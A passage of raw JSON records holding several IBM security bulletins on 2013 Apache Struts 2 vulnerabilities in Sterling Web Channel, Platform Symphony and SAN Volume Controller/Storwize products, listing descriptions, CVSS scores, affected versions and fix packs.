(AV:N/AC:L/Au:N/C:C/I:C/A:C) \n\nCVEID: [_CVE-2013-2251_](<https://vulners.com/cve/CVE-2013-2251>)\n\n**Description:** \nApache Struts could allow a remote attacker to execute arbitrary commands on the system, caused by an error when evaluating the action:, redirect:, and redirectAction: parameters as OGNL (Object-Graph Navigation Language) expressions. An attacker could exploit this vulnerability using a specially-crafted request parameter containing an OGNL expression to inject and execute arbitrary commands on the system. \n \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/85756_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/85756>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P)\n\n \n_ \n_CVEID: [_CVE-2013-2248_](<https://vulners.com/cve/CVE-2013-2248>)\n\n**Description:** \nApache Struts could allow a remote attacker to conduct phishing attacks, caused by an open redirect vulnerability in the DefaultActionMapper class. An attacker could exploit this vulnerability using the redirect: and redirectAction:: parameters in a specially-crafted URL to redirect a victim to arbitrary Web sites.\n\nCVSS Base Score: 4.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/85755_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/85755>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N)\n\n \n_ \n_CVEID: [_CVE-2013-2135_](<https://vulners.com/cve/CVE-2013-2135>)\n\n**Description:** \nApache Struts could allow a remote attacker to bypass security restrictions, caused by double evaluation error when evaluating parameters as OGNL (Object-Graph Navigation Language) expressions. An attacker could exploit this vulnerability using a specially-crafted request parameter containing an OGNL expression to modify server-side objects and inject and execute arbitrary commands on the system.\n\nCVSS Base Score: 7.5 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/84763_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/84763>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P)\n\n \n_ \n_CVEID: [_CVE-2013-2134_](<https://vulners.com/cve/CVE-2013-2134>)\n\n**Description:** \nApache Struts could allow a remote attacker to bypass security restrictions, caused by double evaluation error when evaluating parameters as OGNL (Object-Graph Navigation Language) expressions. An attacker could exploit this vulnerability using a specially-crafted request parameter containing an OGNL expression to modify server-side objects and inject and execute arbitrary commands on the system. \n \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/84762_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/84762%20>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n_ \n_CVEID: [_CVE-2013-2115_](<https://vulners.com/cve/CVE-2013-2115>)\n\n**Description:** \nApache Struts could allow a remote attacker to bypass security restrictions, caused by an incomplete fix for an error related to the handling of the includeParams attribute. An attacker could exploit this vulnerability using a specially-crafted request parameter containing an OGNL expression to modify server-side objects and inject and execute arbitrary commands on the system.\n\n \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/84543_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/84543%20>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n_ \n_CVEID: [_CVE-2013-1966_](<https://vulners.com/cve/CVE-2013-1966>)\n\n**Description:** \nApache Struts could allow a remote attacker to bypass security restriction, caused by the improper handling of the includeParams attribute. An attacker could exploit this vulnerability using a specially-crafted request parameter containing an OGNL expression to inject OGNL code on the system.\n\n \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/84542_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/84542>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P)\n\n \n_ \n_CVEID: [_CVE-2013-1965_](<https://vulners.com/cve/CVE-2013-1965>)\n\n**Description:** \nApache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an error in the Apache Struts Showcase App. An attacker could exploit this vulnerability using a specially-crafted request parameter containing an OGNL expression to inject and execute arbitrary code on the system.\n\nCVSS Base Score: 6.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/85573_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/85573>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:P/I:P/A:P)\n\n## Affected Products and Versions\n\nSterling Web Channel 9.0 \nSterling Web Channel 9.1\n\n## Remediation/Fixes\n\nThe recommended solution is to apply two fix packs sequentially, the security fix pack (SFP) and then followed by the fix pack (FP) as soon as practical. Please see below for information about the available fixes. \n \n \n\n\n**_Product_**| **_Security Fix Pack*_**| **_Fix Pack*_**| **_How to acquire fix_** \n---|---|---|--- \nSterling Web Channel| **_9.0.0-SFP1_**| **_9.0.0-FP5_**| **_<http://www-933.ibm.com/support/fixcentral/options>_** \n \n**_Select appropriate VRMF_** \nSterling Web Channel| **_9.1.0- SFP1_**| **_9.1.0-FP2_**| **_<http://www-933.ibm.com/support/fixcentral/options>_** \n \n**_Select appropriate VRMF _** \n \n## Workarounds and Mitigations\n\nNONE\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-16T19:37:44", "type": "ibm", "title": "Security Bulletin:Sterling Web Channel is affected by Apache Struts 2 security vulnerabilities (CVE-2013-4310, CVE-2013-4316, CVE-2013-2251, CVE-2013-2248, CVE-2013-2135, CVE-2013-2134, CVE-2013-2115, CVE-2013-1966, CVE-2013-1965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-1965", "CVE-2013-1966", "CVE-2013-2115", "CVE-2013-2134", "CVE-2013-2135", "CVE-2013-2248", "CVE-2013-2251", "CVE-2013-4310", "CVE-2013-4316"], "modified": "2018-06-16T19:37:44", "id": "98B23F6FBC89B642E5DC206D9014376ABD6C0435129FB8C81177F33D5AEBB6C3", "href": "https://www.ibm.com/support/pages/node/511555", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T21:53:56", "description": "## Summary\n\nThis bulletin relates to several security vulnerabilities that have been reported against Apache Struts 2 through October 2013. IBM Platform Symphony includes a version of Struts 2 that is vulnerable to these issues. \n\n## Vulnerability Details\n\nSeveral security vulnerabilities have been reported against Apache Struts 2 through October 2013. IBM Platform Symphony\u2019s PMC GUI uses Struts 2 as a framework for Java web applications. A version of the package that is vulnerable to these issues is included in several past versions of IBM Platform Symphony. The latest versions of Struts 2 address all the vulnerabilities and can be applied through the fix detailed in the Remediation section. \n \n \n[**_CVE-2013-4310_**](<https://vulners.com/cve/CVE-2013-4310>) \n \n**Description:** \n \nApache Struts 2.0.0 through 2.3.15.1 allows remote attackers to bypass access controls via a crafted action: prefix. \n \nCVSS Base Score: 5.8 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/87336_](<http://xforce.iss.net/xforce/xfdb/87336>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:P/I:P/A:N) \n \n[**_CVE-2013-2251_**](<https://vulners.com/cve/CVE-2013-2251>) \n \n**Description:** \n \nApache Struts 2.0.0 through 2.3.15 allows remote attackers to execute arbitrary OGNL expressions via a parameter with a crafted (1) action:, (2) redirect:, or (3) redirectAction: prefix. \n \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/85756_](<http://xforce.iss.net/xforce/xfdb/85756%20>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n \n[**_CVE-2013-2248_**](<https://vulners.com/cve/CVE-2013-2248>)** ** \n \n**Description:** \n \nMultiple open redirect vulnerabilities in Apache Struts 2.0.0 through 2.3.15 allow remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in a parameter using the (1) redirect: or (2) redirectAction: prefix. \n \nCVSS Base Score: 4.3 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/85755_](<http://xforce.iss.net/xforce/xfdb/85755%20>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N) \n \n[**_CVE-2013-2135_**](<https://vulners.com/cve/CVE-2013-2135>)** ** \n \n**Description:** \n \nApache Struts 2 before 2.3.14.3 allows remote attackers to execute arbitrary OGNL code via a request with a crafted value that contains both \"${}\" and \"%{}\" sequences, which causes the OGNL code to be evaluated twice. \n \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/84763_](<http://xforce.iss.net/xforce/xfdb/84763%20>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n[**_CVE-2013-2134_**](<https://vulners.com/cve/CVE-2013-2134>) \n \n**Description:** \n \nApache Struts 2 before 2.3.14.3 allows remote attackers to execute arbitrary OGNL code via a request with a crafted action name that is not properly handled during wildcard matching, a different vulnerability than CVE-2013-2135. \n \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/84762_](<http://xforce.iss.net/xforce/xfdb/84762%20>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n[**_CVE-2013-2115_**](<https://vulners.com/cve/CVE-2013-2115>) \n \n**Description:** \n \nApache Struts 2 before 2.3.14.2 allows remote attackers to execute arbitrary OGNL code via a crafted request that is not properly handled when using the includeParams attribute in the (1) URL or (2) A tag. NOTE: this issue is due to an incomplete fix for CVE-2013-1966. \n \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/84543_](<http://xforce.iss.net/xforce/xfdb/84543%20>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n[**_CVE-2013-1966_**](<https://vulners.com/cve/CVE-2013-1966>) \n \n**Description:** \n \nApache Struts 2 before 2.3.14.1 allows remote attackers to execute arbitrary OGNL code via a crafted request that is not properly handled when using the includeParams attribute in the (1) URL or (2) A tag. \n \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/84542_](<http://xforce.iss.net/xforce/xfdb/84542%20>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n[**_CVE-2013-1965_**](<https://vulners.com/cve/CVE-2013-1965>) \n \n**Description:** \n \nApache Struts Showcase App 2.0.0 through 2.3.13, as used in Struts 2 before 2.3.14.1, allows remote attackers to execute arbitrary OGNL code via a crafted parameter name that is not properly handled when invoking a redirect. \n \nCVSS Base Score: 6.8 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/85573_](<http://xforce.iss.net/xforce/xfdb/85573%20>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:P/I:P/A:P) \n \n \n**AFFECTED PRODUCTS AND VERSIONS: ** \nIBM Platform Symphony 5.2 and 6.1.x \n \n \n**REMEDIATION: ** \n \nWe strongly recommend that you apply the following fix from FixCentral to avoid this potential security exposure. \n \n \n\n\n_Product_| _VRMF_| _Fix ID_ \n---|---|--- \n_IBM Platform Symphony_| _5.2_| sym-5.2-build224587 \n_IBM Platform Symphony_| _6.1.0.1_| sym-6.1.0.1-build224587 \nsym-6.1.0.1-build226780 \n_IBM Platform Symphony_| _6.1.1_| sym-6.1.1-build224587 \nsym-6.1.1-build226780 \n \n \n \n**_Workaround(s) & Mitigation(s):_** \nNone \n \n \n \n**REFERENCES: ** \n[](<https://www-304.ibm.com/support/docview.wss?uid=swg21496117&wv=1>)[\u00b7 __Complete CVSS Guide__](<http://www.first.org/cvss/v2/guide>) \n[\u00b7 __On-line Calculator V2__](<http://nvd.nist.gov/cvss.cfm?calculator&adv&version=2>)_ _ \n \n \n \n**RELATED INFORMATION: ** \n[_IBM Secure Engineering Web Portal _](<https://www-304.ibm.com/jct03001c/security/secure-engineering/>)[_IBM Product Security Incident Response Blog_](<https://www.ibm.com/blogs/PSIRT>) \n \n**ACKNOWLEDGEMENT** \nNone \n \n**CHANGE HISTORY** \n20 December, 2013 Original Copy Published \n \n \n\n\n_*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Flash. _\n\n \n**_Note: _**_According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"AS IS\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY._\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-18T01:24:24", "type": "ibm", "title": "Security Bulletin: IBM Platform Symphony (CVE-2013-2251 CVE-2013-2248 CVE-2013-2135 CVE-2013-2134 CVE-2013-2115 CVE-2013-1966 CVE-2013-1965 CVE-2013-4310)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-1965", "CVE-2013-1966", "CVE-2013-2115", "CVE-2013-2134", "CVE-2013-2135", "CVE-2013-2248", "CVE-2013-2251", "CVE-2013-4310"], "modified": "2018-06-18T01:24:24", "id": "64DB3E655F72A48F214A03210C6CABBA2AF9FDD7CFBEC664636D3A72117B8C35", "href": "https://www.ibm.com/support/pages/node/678537", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-09-28T07:02:27", "description": "## Summary\n\nSecurity Bulletin: Unauthorized access exposure on IBM SAN Volume Controller and Storwize Family (CVE-2013-2251 CVE-2013-2248 CVE-2013-2135 CVE-2013-2134 CVE-2013-2115 CVE-2013-1966 CVE-2013-1965)\n\n## Vulnerability Details\n\n## Security Bulletin \n \n--- \n \nSummary \n--- \n \nAdministrative access to the system via the IP interface may be obtained without authentication.\n\n## Vulnerability Details \n \n--- \n \n**CVEID:** CVE-2013-2251 CVE-2013-2248 CVE-2013-2135 CVE-2013-2134 CVE-2013-2115 CVE-2013-1966 CVE-2013-1965\n\n**DESCRIPTION: \n \n** The vulnerabilities can be exploited by a user with access to the system's management IP interface using vulnerabilities in the Apache Struts component. If successful, the user can gain access with superuser privilege which will allow any modification to the configuration, including complete deletion.\n\n[_CVE-2013-2251_](<https://vulners.com/cve/CVE-2013-2251>) \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/85756_](<http://xforce.iss.net/xforce/xfdb/85756>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n_ \n_[_CVE-2013-2248_](<https://vulners.com/cve/CVE-2013-2248>) \nCVSS Base Score: 4.3 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/85755_](<http://xforce.iss.net/xforce/xfdb/85755>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N) \n_ \n_[_CVE-2013-2135_](<https://vulners.com/cve/CVE-2013-2135>) \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/84763_](<http://xforce.iss.net/xforce/xfdb/84763>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n_ \n_[_CVE-2013-2134_](<https://vulners.com/cve/CVE-2013-2134>) \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/84762_](<http://xforce.iss.net/xforce/xfdb/84762%20>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n_ \n_[_CVE-2013-2115_](<https://vulners.com/cve/CVE-2013-2115>) \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/84543_](<http://xforce.iss.net/xforce/xfdb/84543%20>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n_ \n_[_CVE-2013-1966_](<https://vulners.com/cve/CVE-2013-1966>) \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/84542_](<http://xforce.iss.net/xforce/xfdb/84542>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n_ \n_[_CVE-2013-1965_](<https://vulners.com/cve/CVE-2013-1965>) \nCVSS Base Score: 6.8 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/85573_](<http://xforce.iss.net/xforce/xfdb/85573>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:P/I:P/A:P)\n\n## Affected Products and Versions \n \n--- \n \nIBM SAN Volume Controller \nStorwize V7000 for Lenovo \nStorwize V5000 for Lenovo \nStorwize V3700 for Lenovo \nStorwize V3500 for Lenovo \n \nAll products affected when running a version below V6.4.1.7 or V7.1.0.5.\n\n## Remediation/Fixes \n \n--- \n \nFor IBM SAN Volume Controller, Storwize V7000, V5000, V3700 and V3500 for Lenovo and IBM Flex System V7000, install the V6.4.1.7 or V7.1.0.5 PTF level or higher.\n\n## Workarounds and Mitigations \n \n--- \n \nAccess to the system's IP interface can be restricted, for example using a private network or firewall technology. Only users with access to the IP interface can exploit the vulnerability.\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-03-29T01:48:02", "type": "ibm", "title": "Security Bulletin: Unauthorized access exposure on IBM SAN Volume Controller and Storwize Family (CVE-2013-2251, CVE-2013-2248 CVE-2013-2135, CVE-2013-2134, CVE-2013-2115, CVE-2013-1966 and CVE-2013-1965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-1965", "CVE-2013-1966", "CVE-2013-2115", "CVE-2013-2134", "CVE-2013-2135", "CVE-2013-2248", "CVE-2013-2251"], "modified": "2023-03-29T01:48:02", "id": "7F8F02D6D093C8CE68EF519749184D5E3DA2F0A4FC5E9A8C45DADD8885AA6579", "href": "https://www.ibm.com/support/pages/node/866008", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-24T05:56:14", "description": "## Abstract\n\nAdministrative access to the system via the IP interface may be obtained without authentication.\n\n## Content\n\n**VULNERABILITY DETAILS: ** \n \n \n**CVEID: **CVE-2013-2251 CVE-2013-2248 CVE-2013-2135 CVE-2013-2134 CVE-2013-2115 CVE-2013-1966 CVE-2013-1965** ** \n \n \n**DESCRIPTION: ** \n \nThe vulnerabilities can be exploited by a user with access to the system's management IP interface using vulnerabilities in the Apache Struts component. If successful, the user can gain access with superuser privilege which will allow any modification to the configuration, including complete deletion. \n_ \n_[_CVE-2013-2251_](<https://vulners.com/cve/CVE-2013-2251>) \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/85756_](<http://xforce.iss.net/xforce/xfdb/85756>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n_ \n_[_CVE-2013-2248_](<https://vulners.com/cve/CVE-2013-2248>) \nCVSS Base Score: 4.3 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/85755_](<http://xforce.iss.net/xforce/xfdb/85755>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N) \n_ \n_[_CVE-2013-2135_](<https://vulners.com/cve/CVE-2013-2135>) \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/84763_](<http://xforce.iss.net/xforce/xfdb/84763>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n_ \n_[_CVE-2013-2134_](<https://vulners.com/cve/CVE-2013-2134>) \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/84762_](<http://xforce.iss.net/xforce/xfdb/84762%20>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n_ \n_[_CVE-2013-2115_](<https://vulners.com/cve/CVE-2013-2115>) \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/84543_](<http://xforce.iss.net/xforce/xfdb/84543%20>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n_ \n_[_CVE-2013-1966_](<https://vulners.com/cve/CVE-2013-1966>) \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/84542_](<http://xforce.iss.net/xforce/xfdb/84542>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n_ \n_[_CVE-2013-1965_](<https://vulners.com/cve/CVE-2013-1965>) \nCVSS Base Score: 6.8 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/85573_](<http://xforce.iss.net/xforce/xfdb/85573>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:P/I:P/A:P) \n** \nAFFECTED PRODUCTS AND VERSIONS: ** \n \nIBM SAN Volume Controller \nIBM Storwize V7000 \nIBM Storwize V5000 \nIBM Storwize V3500 \nIBM Storwize V3700 \nIBM Flex System V7000 \n \nAll products affected when running a version below V6.4.1.7 or V7.1.0.5. \n \n** \nREMEDIATION: ** \n \nFor IBM SAN Volume Controller, IBM Storwize V7000, V5000, V3700 and V3500 and IBM Flex System V7000, install the V6.4.1.7 or V7.1.0.5 PTF level or higher. \n**_ \nWorkaround(s) & Mitigation(s):_** \n \nAccess to the system's IP interface can be restricted, for example using a private network or firewall technology. Only users with access to the IP interface can exploit the vulnerability. \n \n \n**REFERENCES: ** \n[](<https://www-304.ibm.com/support/docview.wss?uid=swg21496117&wv=1>)[\u00b7 __Complete CVSS Guide__](<http://www.first.org/cvss/v2/guide>) \n[\u00b7 __On-line Calculator V2__](<http://nvd.nist.gov/cvss.cfm?calculator&adv&version=2>)_ _ \n \n \n**RELATED INFORMATION: ** \n[_IBM Secure Engineering Web Portal _](<https://www-304.ibm.com/jct03001c/security/secure-engineering/>) \n[_IBM Product Security Incident Response Blog_](<https://www.ibm.com/blogs/PSIRT>) \n \n**ACKNOWLEDGEMENT** \n \nNone \n \n**CHANGE HISTORY** \n17 December 2013: Updated to reference V6.4.1.7 \n16 October 2013: Original Copy Published\n\n[{\"Product\":{\"code\":\"ST3FR7\",\"label\":\"IBM Storwize V7000\"},\"Business Unit\":{\"code\":\"BU058\",\"label\":\"IBM Infrastructure w\\/TPS\"},\"Component\":\"7.1\",\"Platform\":[{\"code\":\"\",\"label\":\"IBM Storwize V7000\"}],\"Version\":\"6.1;6.2;6.3;6.4;7.1\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB26\",\"label\":\"Storage\"}},{\"Product\":{\"code\":\"STLM6B\",\"label\":\"IBM Storwize V3500 (2071)\"},\"Business Unit\":{\"code\":\"BU058\",\"label\":\"IBM Infrastructure w\\/TPS\"},\"Component\":\"7.1\",\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"6.4;7.1\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB26\",\"label\":\"Storage\"}},{\"Product\":{\"code\":\"STLM5A\",\"label\":\"IBM Storwize V3700 (2072)\"},\"Business Unit\":{\"code\":\"BU058\",\"label\":\"IBM Infrastructure w\\/TPS\"},\"Component\":\"7.1\",\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"6.4;7.1\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB26\",\"label\":\"Storage\"}},{\"Product\":{\"code\":\"STHGUJ\",\"label\":\"IBM Storwize V5000\"},\"Business Unit\":{\"code\":\"BU058\",\"label\":\"IBM Infrastructure w\\/TPS\"},\"Component\":\"7.1\",\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"7.1\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB26\",\"label\":\"Storage\"}},{\"Product\":{\"code\":\"STPVGU\",\"label\":\"SAN Volume Controller\"},\"Business Unit\":{\"code\":\"BU058\",\"label\":\"IBM Infrastructure w\\/TPS\"},\"Component\":\"7.1\",\"Platform\":[{\"code\":\"\",\"label\":\"SAN Volume Controller\"}],\"Version\":\"6.1;6.2;6.3;6.4;7.1\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB26\",\"label\":\"Storage\"}}]", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-26T22:21:32", "type": "ibm", "title": "Security Bulletin: Unauthorized access exposure on IBM SAN Volume Controller and Storwize Family (CVE-2013-2251 CVE-2013-2248 CVE-2013-2135 CVE-2013-2134 CVE-2013-2115 CVE-2013-1966 CVE-2013-1965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-1965", "CVE-2013-1966", "CVE-2013-2115", "CVE-2013-2134", "CVE-2013-2135", 